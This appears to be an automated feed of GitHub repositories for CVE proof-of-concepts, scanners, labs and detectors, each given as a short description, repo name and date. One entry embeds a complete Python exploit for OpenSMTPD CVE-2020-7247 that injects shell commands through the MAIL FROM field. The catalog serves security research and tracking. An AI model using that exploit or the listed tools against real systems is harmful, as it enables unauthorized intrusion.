CVE-2021-42664 - Stored Cross-Site Scripting vulnerability in the Engineers online portal system. : TheHackingRabbi/CVE-2021-42664 create time: 2021-11-03T19:29:57Z
CVE-2021-42663 - HTML Injection vulnerability in the Online event booking and reservation system. : TheHackingRabbi/CVE-2021-42663 create time: 2021-11-03T18:49:28Z
no description : Peterpan0927/TFC-Chrome-v8-bug-CVE-2021-38001-poc create time: 2021-11-05T03:18:46Z
no description : hh-hunter/cve-2021-22205 create time: 2021-11-05T05:35:10Z
no description : maldiohead/TFC-Chrome-v8-bug-CVE-2021-38001-poc create time: 2021-11-05T02:58:15Z
Some docker images to play with CVE-2021-41773 and CVE-2021-42013 : Hydragyrum/CVE-2021-41773-Playground create time: 2021-11-04T22:52:44Z
A list of CVEs patched and unpatched in 2021. : xbdmdev/0days-In-The-Wild create time: 2021-11-04T17:42:01Z
Modification of gitlab exploit anything under 13.10 : ph-arm/CVE-2021-22204-Gitlab create time: 2021-11-04T14:31:02Z
Exploitation code for CVE-2021-40539 : synacktiv/CVE-2021-40539 create time: 2021-11-03T14:49:27Z
CVE-2021-22205& GitLab CE/EE RCE : devdanqtuan/CVE-2021-22205 create time: 2021-11-04T09:01:07Z
no description : zkhalidul/GrabberWP-CVE-2017-5487 create time: 2021-11-04T02:25:57Z
CVE-2021-42662 - Stored Cross-Site Scripting vulnerability in the Online event booking and reservation system. : TheHackingRabbi/CVE-2021-42662 create time: 2021-11-03T17:51:55Z
It is a simple tool to exploit local file include . vulnerabilities : Adel-kaka-dz/CVE-2006-3392 create time: 2021-11-03T19:51:31Z
Information about CVE-2021-43141, a reflected XSS in the plan_application section. : Dir0x/CVE-2021-43141 create time: 2021-11-03T17:51:29Z
SQL injection vulnerability in login exists in Sourcecodester Simple Subscription Website. : Dir0x/CVE-2021-43140 create time: 2021-11-03T17:39:22Z
Exploit Apache 2.4.50(CVE-2021-42013) : robotsense1337/CVE-2021-42013 create time: 2021-11-03T17:33:52Z
cve-2020-0022 : devdanqtuan/poc-for-cve-2020-0022 create time: 2021-11-03T15:48:53Z
PoC for CVE-2015-1635 / MS15-034 - HTTP.sys Allows Remote Code Execution / Check & DOS : nksf7/CVE-2015-1635 create time: 2021-11-03T14:50:55Z
Directory Traversal in Afterlogic webmail aurora and pro : dorkerdevil/CVE-2021-26294 create time: 2021-11-03T14:32:13Z
no description : guidepointsecurity/CVE-2021-29156 create time: 2021-11-03T13:21:50Z
PoC for CVE-2020-14181 - Jira User Enumeration via /ViewUserHover.jspa : nksf7/CVE-2020-14181 create time: 2021-11-03T10:51:38Z
redoing cve_2020 repository : sinjeanmin/cvedetails_2020_final create time: 2021-11-03T10:47:30Z
no description : imojne/CVE-2018-6574-POC create time: 2021-11-03T09:15:52Z
POC for CVE-2021-34429 : ColdFusionX/CVE-2021-34429 create time: 2021-11-03T09:13:12Z
Test vulnerability of CVE-2020-3452 : Aviksaikat/CVE-2020-3452 create time: 2021-11-03T07:27:14Z
the metasploit script(POC) about CVE-2021-36260 : TaroballzChen/CVE-2021-36260-metasploit create time: 2021-11-03T08:11:49Z
WordPress Plugin HTML Author Bio description XSS : dnr6419/CVE-2021-24545 create time: 2021-11-03T05:41:46Z
fuel CMS 1.4.1 - Remote Code Execution : Trushal2004/CVE-2018-16763 create time: 2021-11-03T04:38:54Z
Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694) : js-on/CVE-2021-42694 create time: 2021-11-02T20:39:47Z
Generate malicious files using recently published bidi-attack (CVE-2021-42574) : js-on/CVE-2021-42574 create time: 2021-11-02T15:32:38Z
no description : josebarahona1895/cvenlinea2021 create time: 2021-07-23T18:38:22Z
Applications that reproduce CVE-2021-22119 : mari6274/oauth-client-exploit create time: 2021-11-02T15:16:24Z
WIP kernel exploit for minor bug i found in amd gpu driver : docfate111/CVE-2021-42327 create time: 2021-10-28T21:10:29Z
no description : x6Hook/CVE-2018-6574 create time: 2021-11-01T19:06:24Z
no description : hffaust/CVE-2021-42574_and_CVE-2021-42694 create time: 2021-11-01T17:13:50Z
MovableType XMLRPC - RCE : Cosemz/CVE-2021-20837 create time: 2021-11-01T13:32:57Z
no description : shiomiyan/CVE-2021-42574 create time: 2021-11-01T13:05:48Z
no description : Qclover/Gitlab_RCE_CVE_2021_2205 create time: 2021-11-01T07:38:45Z
CVE-2021-22205-getshell : shang159/CVE-2021-22205-getshell create time: 2021-11-01T06:06:04Z
no description : AkBanner/CVE-2021-22205 create time: 2021-11-01T05:42:17Z
Windows HTTP协议栈远程代码执行漏洞 CVE-2021-31166 : antx-code/CVE-2021-31166 create time: 2021-09-27T05:56:45Z
Gitlab CI Lint API未授权 SSRF漏洞 CVE-2021-22214 : antx-code/CVE-2021-22214 create time: 2021-11-01T04:04:42Z
personal : b3tterm4n/CVE-2021-22205 create time: 2021-10-29T09:09:45Z
CVE-2021-22205 RCE : c0okB/CVE-2021-22205 create time: 2021-10-31T14:34:51Z
POC Jamovi <=1.6.18 is affected by a cross-site scripting (XSS) vulnerability. The column-name is vulnerable to XSS in the ElectronJS Framework. An attacker can make a .omv (Jamovi) document containing a payload. When opened by victim, the payload is triggered. : g33xter/CVE-2021-28079 create time: 2021-10-31T08:29:53Z
CVE-2021-22205漏洞检测 : Seals6/CVE-2021-22205 create time: 2021-10-31T04:15:30Z
have a test : ohnonoyesyes/CVE-2021-20837 create time: 2021-10-31T01:37:10Z
no description : bypazs/CVE-2020-0668 create time: 2021-10-30T17:28:54Z
no description : bypazs/cve-2020-0668.exe create time: 2021-10-30T17:15:01Z
CVE-2019-9729. Transferred from https://github.com/DoubleLabyrinth/SdoKeyCrypt-sys-local-privilege-elevation : timeowilliamsq/HyperSine create time: 2021-10-30T15:56:37Z
no description : anaCvetkovic1234/Ana-Cvetkovic-0427-2018-Bunus2 create time: 2021-10-30T12:37:28Z
no description : anaCvetkovic1234/Ana-Cvetkovic-0427-2018-Bonus2 create time: 2021-10-30T12:33:19Z
PoC in single line bash : findneo/GitLab-preauth-RCE_CVE-2021-22205 create time: 2021-10-30T11:54:29Z
C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode in… : yaoxiaoangry3/Flangvik create time: 2021-10-30T11:31:48Z
XMLRPC - RCE in MovableTypePoC : oxctdev/CVE-2021-20837 create time: 2021-10-30T09:15:56Z
CVE-2021-22205 移除了对djvumake & djvulibre的依赖,可在win平台使用 : whwlsfb/CVE-2021-22205 create time: 2021-10-30T02:56:34Z
no description : kienquoc102/CVE-2017-8225 create time: 2021-10-30T02:28:27Z
HeartBleed (CVE-2014-0160) vulnerability detector written in go, hopefully a webapp added soon :) : joshmerr/goHeartBleed create time: 2021-10-29T23:25:29Z
Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters.. : hax3xploit/CVE-2021-41646 create time: 2021-10-29T22:31:32Z
Remote Code Execution (RCE) vulnerability exists in Sourcecodester Budget and Expense Tracker System 1.0 that allows a remote malicious user to inject arbitrary code via the image upload field. : hax3xploit/CVE-2021-41645 create time: 2021-10-29T22:30:21Z
Remote Code Exection (RCE) vulnerability exists in Sourcecodester Online Food Ordering System 2.0 via a maliciously crafted PHP file that bypasses the image upload filters. : hax3xploit/CVE-2021-41644 create time: 2021-10-29T22:28:01Z
Remote Code Execution (RCE) vulnerability exists in Sourcecodester Church Management System 1.0 via the image upload field. : hax3xploit/CVE-2021-41643 create time: 2021-10-29T22:24:42Z
no description : 0xAgun/CVE-2019-18935-checker create time: 2021-10-29T16:57:46Z
no description : scopion/CVE-2018-8947 create time: 2021-10-29T15:12:35Z
no description : scopion/cve-2019-9081 create time: 2021-10-29T14:47:39Z
no description : scopion/CVE-2020-10963 create time: 2021-10-29T14:56:05Z
Post authenticated stored-xss in XenForo versions ≤ 2.2.7 : SakuraSamuraii/CVE-2021-43032 create time: 2021-10-29T14:09:44Z
no description : p0dalirius/CVE-2016-10956_mail_masta create time: 2021-10-29T12:31:21Z
Setup vulnerable enviornment : wolf1892/CVE-2021-41773 create time: 2021-10-29T06:31:57Z
CVE-2021-22205& GitLab CE/EE RCE : Al1ex/CVE-2021-22205 create time: 2021-10-29T04:30:45Z
Gitlab RCE 未授权远程代码执行漏洞 : antx-code/CVE-2021-22205 create time: 2021-10-29T04:15:00Z
Exploit of CVE-2017-7529 : rajesh457/CVE-2017-7529 create time: 2021-10-29T01:08:23Z
An attempt to reproduce Microsoft MSHTML Remote Code Execution (RCE) Vulnerability and using Metasploit Framework. : 0xK4gura/CVE-2021-40444-POC create time: 2021-10-28T14:55:46Z
CVE-2021-22205 Exploit : r0eXpeR/CVE-2021-22205 create time: 2021-10-28T14:02:51Z
An attempt to reproduce Microsoft MSHTML Remote Code Execution Vulnerability : 0xK4gura/CVE-2021-40444-POC create time: 2021-10-28T13:40:23Z
no description : BabyTeam1024/CVE-2021-40438 create time: 2021-10-28T11:48:12Z
no description : RobertDra/CVE-2021-31862 create time: 2021-10-28T07:18:01Z
Pocsuite3 For CVE-2021-22205 : RedTeamWing/CVE-2021-22205 create time: 2021-10-28T06:29:37Z
Something about CVE-2020-0668 : ycdxsb/CVE-2020-0668 create time: 2021-10-28T05:30:14Z
Something about CVE-2020-0668 : ycdxsb/CVE-2020-0668 create time: 2021-10-28T05:15:48Z
批量扫描CVE-2020-0796 : F6JO/CVE-2020-0796-Batch-scanning create time: 2021-10-28T03:39:03Z
Information about CVE-2021-41728, a reflected XSS in the search function. : Dir0x/CVE-2021-41728 create time: 2021-10-27T20:04:12Z
command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. : Aiminsun/CVE-2021-36260 create time: 2021-10-27T15:51:12Z
cve-2021-42013.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.50 : walnutsecurity/CVE-2021-42013 create time: 2021-10-27T14:29:10Z
no description : b1tg/CVE-2021-34486-exp create time: 2021-10-27T11:39:08Z
no description : Trushal2004/CVE-2019-9053 create time: 2021-10-27T09:40:32Z
no description : Jun-5heng/CVE-2021-22005 create time: 2021-10-27T08:36:21Z
WooCommerce exploit : andnorack/CVE-2021-32789 create time: 2021-10-27T04:15:07Z
no description : rafaelcaria/drupalgeddon2-CVE-2018-7600 create time: 2021-10-27T03:09:48Z
no description : volysandro/cve_2019-6447 create time: 2021-10-26T08:46:41Z
Ce programme permet de détecter une faille RCE sur les serveurs Apache 2.4.49 et Apache 2.4.50 : Balgogan/CVE-2021-41773 create time: 2021-10-26T19:11:28Z
Remote Code Execution exploit for Apache servers. Affected versions: Apache 2.4.49, Apache 2.4.50 : mr-exo/CVE-2021-41773 create time: 2021-10-26T17:56:25Z
no description : SECFORCE/CVE-2021-37748 create time: 2021-10-25T12:16:41Z
Google Chrome Vulnerabilities CVE-2021-30573 : kh4sh3i/CVE-2021-30573 create time: 2021-10-26T07:44:27Z
CVE-2021-26084,Atlassian Confluence OGNL注入漏洞 : lleavesl/CVE-2021-26084 create time: 2021-10-26T06:01:38Z
no description : kienquoc102/CVE-2017-8225 create time: 2021-08-16T03:34:17Z
ReadTeam-CVE-2021 : DD885/ReadTeam-CVE-2021 create time: 2021-10-26T02:23:12Z
Script fo testing CVE-2000-0649 for Apache and MS ISS servers : stevenvegar/cve-2000-0649 create time: 2021-10-25T23:14:04Z
A automatic scanner to apache 2.4.49 : vida00/Scanner-CVE-2021-41773 create time: 2021-10-25T21:34:08Z
PoC for the CVE-2021-20837 : RCE in MovableType : ghost-nemesis/cve-2021-20837-poc create time: 2021-10-25T21:25:39Z
no description : MazX0p/CVE-2021-41773 create time: 2021-10-25T18:21:43Z
A python script intended to automate the exploitation of the ShellSchock vulnerability (CVE-2014-6271) : alexphiliotis/ShellShock create time: 2021-10-25T16:13:48Z
Google Chrome Vulnerabilities CVE-2021-30573 : oxctdev/CVE-2021-30573 create time: 2021-10-25T13:25:23Z
My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal. : hakivvi/CVE-2021-40449 create time: 2021-10-25T04:58:49Z
A Zeek package which raises notices for Path Traversal/RCE in Apache HTTP Server 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013) : corelight/CVE-2021-41773 create time: 2021-10-08T06:54:27Z
no description : Jun-5heng/CVE-2021-26084 create time: 2021-10-25T03:07:28Z
no description : TiagoSergio/CVE-2021-40444 create time: 2021-10-24T23:17:12Z
no description : TiagoSergio/CVE-2021-22005 create time: 2021-10-24T23:14:01Z
Exploit to CVE-2004-2687 vulnerability : sukraken/distcc_exploit.py create time: 2021-10-24T21:22:17Z
PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI : TheLastVvV/CVE-2021-42013_Reverse-Shell create time: 2021-10-24T12:57:55Z
CVE-2021-41773 is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.49 : walnutsecurity/cve-2021-41773 create time: 2021-10-23T12:31:53Z
CVE-2021-40438 exploit PoC with Docker setup. : sixpacksecurity/CVE-2021-40438 create time: 2021-10-24T10:18:08Z
Poc CVE-2021-42013 - Apache 2.4.50 without CGI : TheLastVvV/CVE-2021-42013 create time: 2021-10-23T21:58:44Z
Poc CVE 2021-41773 - Apache 2.4.49 with CGI enabled : TheLastVvV/CVE-2021-41773 create time: 2021-10-23T21:37:25Z
no description : engkikarnando/cvengki.html-2021 create time: 2021-10-23T03:01:42Z
SolarWinds Orion Platform ActionPluginBaseView 反序列化RCE : Y4er/CVE-2021-35215 create time: 2021-10-23T01:35:42Z
no description : aravinddathd/CVE-2018-1123 create time: 2021-10-22T19:36:29Z
PoC for CVE-2021-2471 - XXE in MySQL Connector/J : DrunkenShells/CVE-2021-2471 create time: 2021-10-22T17:59:16Z
no description : cckuailong/CVE-2021-2471 create time: 2021-10-22T15:36:38Z
no description : BabyTeam1024/CVE-2021-41773 create time: 2021-10-22T15:12:12Z
h2-jdbc(h2database/h2database#3195) & mysql-jdbc(CVE-2021-2471) SQLXML XXE vulnerability reduce. : SecCoder-Security-Lab/jdbc-sqlxml-xxe create time: 2021-10-22T07:14:25Z
no description : scopion/CVE-2017-3241 create time: 2021-10-22T03:39:01Z
nxlog ubuntu CVE-2020-35488 : githubfoam/nxlog-ubuntu-githubactions create time: 2021-10-12T18:25:17Z
A bash script that attempts to flood a server with TLS renegotiations by using the openssl client. See CVE-2011-1473 and CVE-2011-1473 for details. : XDLDCG/bash-tls-reneg-attack create time: 2019-08-28T02:17:27Z
no description : ItsFadinG/CVE-2018-11235 create time: 2021-10-21T12:12:16Z
For IS713 Project : sinjeanmin/cvedetails_2020 create time: 2021-10-21T11:31:24Z
CVE 2021 40444 Windows Exploit services.dll : kal1gh0st/CVE-2021-40444_CAB_archives create time: 2021-09-24T10:59:34Z
THIS IS NOT AN ORIGINAL EXPLOIT. THIS IS AN AUDITED VERSION FOR A THM BOX : Cinnamon1212/Modified-CVE-2020-10915-MsfModule create time: 2021-10-20T20:27:42Z
no description : BincangSiber/CVE-2021-42013 create time: 2021-10-20T15:32:39Z
no description : BincangSiber/CVE-2021-41773 create time: 2021-10-20T14:41:15Z
no description : ItsFadinG/CVE-2018-6574 create time: 2021-10-20T12:04:56Z
no description : robotserves/CVE-2021-40449-Exploit create time: 2021-10-20T12:04:52Z
no description : qwutony/CVE-2021-41773 create time: 2021-10-20T11:27:12Z
windows 10 14393 LPE : KaLendsi/CVE-2021-40449-Exploit create time: 2021-10-20T09:24:36Z
Just a simple CVE-2021-31166 exploit tool : ConMiko/CVE-2021-31166-exploit create time: 2021-10-20T07:37:46Z
CVE-2021-3156 exploit : Bubleh21/CVE-2021-3156 create time: 2021-10-20T07:34:53Z
CVE-2021-41773 Docker lab : cloudbyteelias/CVE-2021-41773 create time: 2021-10-20T01:20:21Z
CVE-2019-3980 exploit written in win32/c++ (openssl dependency). Port of https://github.com/tenable/poc/blob/master/Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py : Barbarisch/CVE-2019-3980 create time: 2021-10-19T18:28:47Z
此项目为复现CVE-2020-13933 shiro漏洞所搭建的简易springboot+shiro项目 : kunFeng1998/CVE-2020-13933Project create time: 2021-10-19T09:33:46Z
If an authenticated user who is able to edit Wordpress PHP code in any kind, clicks a malicious link, PHP code can be edited through XSS in Formidable Forms 4.09.04. : S1lkys/CVE-2021-24884 create time: 2021-10-18T16:37:08Z
Drupal remote code execution vulnerabilty : Vulnmachines/drupal-cve-2019-6339 create time: 2021-10-19T06:59:29Z
no description : bibo318/kali-CVE-2019-0708-lab create time: 2021-10-19T06:49:45Z
no description : xiaojiangxl/CVE-2021-21234 create time: 2021-10-19T01:08:48Z
A small PoC for the recent RCE found in the Goahead Webserver prior to version 5.1.5. : kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342- create time: 2021-10-12T06:21:02Z
Dahua IPC/VTH/VTO devices auth bypass exploit : dorkerdevil/CVE-2021-33044 create time: 2021-10-18T16:02:41Z
no description : vulf/CVE-2021-41773_42013 create time: 2021-10-18T12:01:58Z
no description : huydoppa/CVE-2018-15133 create time: 2021-10-18T09:23:05Z
Exploit For CVE-2019-17662 : rajendrakumaryadav/CVE-2019-17662-Exploit create time: 2021-10-18T08:26:47Z
Exploit For CVE-2019-17662 : acm-iem/CVE-2019-17662-Exploit create time: 2021-10-18T06:51:06Z
CVE-2021-36260 : rabbitsafe/CVE-2021-36260 create time: 2021-10-18T06:40:48Z
no description : xiaojiangxl/CVE-2021-40438 create time: 2021-10-18T02:02:43Z
Exploit for CVE-2019-17662 : acm-iem/CVE-2019-17662-Exploit create time: 2021-10-17T20:38:22Z
no description : acm-iem/CVE-2019-17662 create time: 2021-10-17T16:30:29Z
Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) : ly4k/PrintNightmare create time: 2021-09-26T13:53:10Z
EDB-ID: 47984 CVE: 2020-7247 EDB Verified: Author: 1F98D Type: REMOTE Exploit: / Platform: LINUX Date: 2020-01-30 Vulnerable App: # Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution # Date: 2020-01-29 # Exploit Author: 1F98D # Original Author: Qualys Security Advisory # Vendor Homepage: https://www.opensmtpd.org/ # Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1 # Version: OpenSMTPD < 6.6.2 # Tested on: Debian 9.11 (x64) # CVE: CVE-2020-7247 # References: # https://www.openwall.com/lists/oss-security/2020/01/28/3 # # OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately # escape dangerous characters from user-controlled input. An attacker # can exploit this to execute arbitrary shell commands on the target. # #!/usr/local/bin/python3 from socket import * import sys if len(sys.argv) != 4: print('Usage {} '.format(sys.argv[0])) print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0])) sys.exit(1) ADDR = sys.argv[1] PORT = int(sys.argv[2]) CMD = sys.argv[3] s = socket(AF_INET, SOCK_STREAM) s.connect((ADDR, PORT)) res = s.recv(1024) if 'OpenSMTPD' not in str(res): print('[!] No OpenSMTPD detected') print('[!] Received {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[] OpenSMTPD detected') s.send(b'HELO x\r\n') res = s.recv(1024) if '250' not in str(res): print('[!] Error connecting, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[] Connected, sending payload') s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8')) res = s.recv(1024) if '250' not in str(res): print('[!] Error sending payload, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[] Payload sent') s.send(b'RCPT TO:\r\n') s.recv(1024) s.send(b'DATA\r\n') s.recv(1024) s.send(b'\r\nxxx\r\n.\r\n') s.recv(1024) s.send(b'QUIT\r\n') s.recv(1024) print('[] Done') : Sergio928/OpenSMTPD-6.6.1---Remote-Code-Execution---Linux-remote-Exploit create time: 2021-10-16T22:10:47Z
EDB-ID: 47984 CVE: 2020-7247 EDB Verified: Author: 1F98D Type: REMOTE Exploit: / Platform: LINUX Date: 2020-01-30 : Sergio928/OpenSMTPD-6.6.1---Remote-Code-Execution create time: 2021-10-16T21:52:47Z
ES File Explorer v4.1.9.7.4 Open port vulnerability exploit. CVE-2019-6447 : febinrev/CVE-2019-6447-ESfile-explorer-exploit create time: 2021-10-07T13:41:06Z
CVE-2020-10770 for nuclei : CrowX500x0/CVE-2020-10770 create time: 2021-10-16T15:54:38Z
PoC (DoS) for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE) : ollypwn/CallbackHell create time: 2021-10-16T16:17:44Z
Simple honeypot for CVE-2021-41773 vulnerability : lopqto/CVE-2021-41773_Honeypot create time: 2021-10-16T15:30:34Z
TIC4301 Project - CVE-2021-40444 : factionsypho/TIC4301_Project create time: 2021-10-16T07:07:26Z
no description : anonsecteaminc/CVE-2020-5902-Scanner create time: 2021-10-16T02:10:03Z
CVE-2021-41773-PoC : anonsecteaminc/CVE-2021-41773-PoC create time: 2021-10-16T01:32:17Z
Little thing put together quickly to demonstrate this CVE : 0xAJ2K/CVE-2020-11022-CVE-2020-11023 create time: 2021-10-16T01:10:33Z
The first vulnerability with the CVE identifier CVE-2021-41773 is a path traversal flaw that exists in Apache HTTP Server 2.4.49. : LudovicPatho/CVE-2021-41773 create time: 2021-10-15T21:38:48Z
IBM WebSphere deserialization of untrusted data - IBM WebSphere 7,8,8.5,9 : BitWrecker/CVE-2016-5983 create time: 2021-10-15T21:09:15Z
Using curl to exploit CVE-2019-11447 : iainr/CuteNewsRCE create time: 2021-10-15T20:15:41Z
no description : shiomiyan/CVE-2021-41773 create time: 2021-10-07T15:00:55Z
no description : brydennik69/First-CVE2021 create time: 2021-10-15T18:41:36Z
In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header. : adubaldo/CVE-2021-42071 create time: 2021-10-15T16:08:16Z
no description : chinaYozz/CVE-2020-25078 create time: 2021-10-15T13:03:29Z
apache httpd path traversal checker(CVE-2021-41773 / CVE-2021-42013) : theLSA/apache-httpd-path-traversal-checker create time: 2021-10-15T10:38:44Z
Exploit for remote command execution in Golang go get command. : Devang-Solanki/CVE-2018-6574 create time: 2021-10-15T08:02:02Z
no description : koharin/CVE-2020-0041 create time: 2021-09-10T08:01:54Z
no description : FitTerminator/PS4-CVE-202130858 create time: 2021-10-14T20:30:11Z
Docker container lab to play/learn with CVE-2021-42013 : twseptian/CVE-2021-42013-Lab create time: 2021-10-14T18:00:48Z
no description : dorkerdevil/CVE-2021-36749 create time: 2021-10-14T17:30:55Z
A simple Python proof of concept for CVE-2021-38295. : ProfessionallyEvil/CVE-2021-38295-PoC create time: 2021-10-14T15:45:21Z
no description : zomy22/CVE-2020-16846-Saltstack-Salt-API create time: 2021-10-14T10:09:48Z
My take on CVE-2021-30858 for ps4 8.xx : PeterMxx/ps4_8.00_vuln_poc create time: 2021-10-14T09:24:51Z
Hi there! Thanks for testing out my first ever Github repository & implementation of an iOS webkit exploit! So you are aware: I did not discover this exploit, and I also did not write most of this. So far, I have started off with modifying existing code to begin to learn how this all works. Let me know how your experience went! : FitTerminator/CVE-202130858 create time: 2021-10-14T04:28:42Z
Apache Druid 任意文件读取 : BrucessKING/CVE-2021-36749 create time: 2021-10-14T03:47:02Z
Testing CVE-2021-30858 Rev3 : KameleonReloaded/CVEREV3 create time: 2021-10-14T01:51:39Z
VERY simple code to check if the browser is compatible or not : Nazky/PS4CVE202130858 create time: 2021-10-13T20:15:19Z
no description : musergi/CVE-2021-3156 create time: 2021-10-13T17:43:51Z
Tool check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519 : MrCl0wnLab/SimplesApachePathTraversal create time: 2021-10-13T17:03:56Z
no description : Hasintha-98/Sudo-Vulnerability-Exploit-CVE-2019-14287 create time: 2021-10-13T08:35:57Z
Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) : ColdFusionX/Keycloak-12.0.1-CVE-2020-10770 create time: 2021-10-13T08:40:33Z
no description : IBUILI/CVE-2021-41730 create time: 2021-10-13T02:12:11Z
PoC CVE-2021-37980 : Inappropriate implementation in Sandbox (windows only) : ZeusBox/CVE-2021-37980 create time: 2021-10-12T19:14:29Z
no description : hoavt184/CVE-2021-22941 create time: 2021-10-12T14:52:38Z
Proof of concept for Strapi CVE-2019-18818 - Unauthenticated Password Reset Vulnerability : Shadawks/Strapi-CVE-2019-1881 create time: 2021-10-12T14:16:17Z
because people want to test it : Nazky/PS4CVE20211879 create time: 2021-10-12T12:47:14Z
CVE-2021-42261 : jet-pentest/CVE-2021-42261 create time: 2021-10-12T10:50:01Z
Atlassian Jira Server/Data Center 8.4.0 - Arbitrary File read (CVE-2021-26086) : ColdFusionX/CVE-2021-26086 create time: 2021-10-05T14:09:52Z
Windows Etw LPE : KaLendsi/CVE-2021-34486 create time: 2021-10-12T03:50:44Z
Path Traversal and RCE in Apache HTTP Server 2.4.49 : 0xAlmighty/CVE-2021-41773-PoC create time: 2021-10-12T00:51:32Z
Unauthenticated Remote Code Execution at Woody Ad Snippets (PoC) : oxctdev/CVE-2019-15858 create time: 2021-10-11T21:37:06Z
Chrome extension that uses vulnerabilities CVE-2021-33044 and CVE-2021-33045 to log in to Dahua cameras without authentication. : bp2008/DahuaLoginBypass create time: 2021-10-11T22:08:47Z
Currently on a purple team project performing the Printernightmare also known as CVE 2021-1675: A vulnerability that allows an attacker with low access privileges to use a malicious DLL file to escalate privilege. Threat actors can only take advantage of the vulnerability if they have direct access to the vulnerable system, so Microsoft categorized it as low-risk. The June 2021 Security Updates included a successful patch for CVE 2021-1675. remote code execution -cvs-2021-34527- A remote code execution (RCE) vulnerability that allows threat actors to remotely inject DLLs : Sirius-RJ/FullstackAcademy-Printernightmare-writeup-2105-E.C.A.R. create time: 2021-10-11T21:46:24Z
C-Ark Credential Decoder for #CVE-2021-31796 : unmanarc/CACredDecoder create time: 2017-04-19T06:01:08Z
no description : dongpohezui/cve-2021-33045 create time: 2021-10-11T15:11:48Z
no description : rasyidfox/CVE-2019-18818 create time: 2021-10-11T05:24:04Z
Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE : scarmandef/CVE-2021-41773 create time: 2021-10-11T03:03:08Z
CVE-2021-41773 Grabber : apapedulimu/Apachuk create time: 2021-10-11T00:57:27Z
no description : cgddgc/CVE-2021-41773-42013 create time: 2021-10-10T10:09:52Z
no description : Tuz-Wwsd/CVE-2019-15107_detection create time: 2021-10-10T09:05:55Z
CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited : twseptian/CVE-2021-41773 create time: 2021-10-07T11:55:10Z
mass scan for apache 2.4.49/2.4.50 : meicookies/cve-2021-41773_2021-42013 create time: 2021-10-09T16:28:06Z
Apache 2.4.49 Path Traversal Vulnerability Checker : EagleTube/CVE-2021-41773 create time: 2021-10-09T16:07:57Z
cve-2021-41773 即 cve-2021-42013 批量检测脚本 : 5gstudent/cve-2021-41773-and-cve-2021-42013 create time: 2021-10-09T11:33:56Z
PoC for CVE-2021-3129 (Laravel) : knqyf263/CVE-2021-3129 create time: 2021-10-01T09:09:38Z
no description : Murasame-nc/CVE-2020-0796-LPE-POC create time: 2021-10-09T08:19:55Z
Remote Code Execution POC for CVE-2020-0796 : oxctdev/CVE-2020-0796 create time: 2021-10-09T04:52:55Z
CVE-2021-41773 CVE-2021-42013漏洞批量检测工具 : inbug-team/CVE-2021-41773_CVE-2021-42013 create time: 2021-10-09T03:32:18Z
no description : KAB8345/CVE-2021-41773 create time: 2021-10-09T03:21:41Z
Apache CVE-2021-41773/2021-42013 Mass Vulnerability Checker : im-hanzou/apachrot create time: 2021-10-09T02:12:39Z
no description : Tau-hub/Firefox-CVE-2016-9079 create time: 2021-10-08T21:44:13Z
POC : superzerosec/CVE-2021-41773 create time: 2021-10-08T15:40:41Z
ITSM_Broken_control : ArianeBlow/CVE-2021-27513 create time: 2021-10-08T13:11:00Z
A Python script to check if an Apache web server is vulnerable to CVE-2021-41773 : b1tsec/CVE-2021-41773 create time: 2021-10-08T08:32:51Z
A framework for bug hunting or pentesting targeting websites that have CVE-2021-41773 Vulnerability in public : HightechSec/scarce-apache2 create time: 2021-10-07T01:31:13Z
Fast python tool to test apache path traversal CVE-2021-41773 in a List of url : zeronine9/CVE-2021-41773 create time: 2021-10-08T07:24:49Z
no description : ComdeyOverFlow/CVE-2021-41773 create time: 2021-10-07T12:30:13Z
I have come-up with a POC for Payara Micro Community 5.2021.6 - Directory Traversal, Please refer above reference field. : Net-hunter121/CVE-2021-41381 create time: 2021-10-08T05:52:20Z
Apache 2.4.50 Path traversal vulnerability : Vulnmachines/cve-2021-42013 create time: 2021-10-08T05:44:54Z
Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code : JoyGhoshs/CVE-2021-40870 create time: 2021-10-08T05:35:40Z
Exploit for Apache 2.4.49 : 0xRar/CVE-2021-41773 create time: 2021-10-08T04:26:31Z
no description : pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt create time: 2021-10-08T04:43:27Z
CVE-2021-41773, poc, exploit : vinhjaxt/CVE-2021-41773-exploit create time: 2021-10-07T08:10:00Z
-H 192.168.1.1-192.168.5.255 : einzbernnn/CVE-2020-1938Scan create time: 2021-10-08T04:20:43Z
Apache HTTPd (2.4.49) – Local File Disclosure (LFI) : oxctdev/CVE-2021-41773 create time: 2021-10-07T00:14:40Z
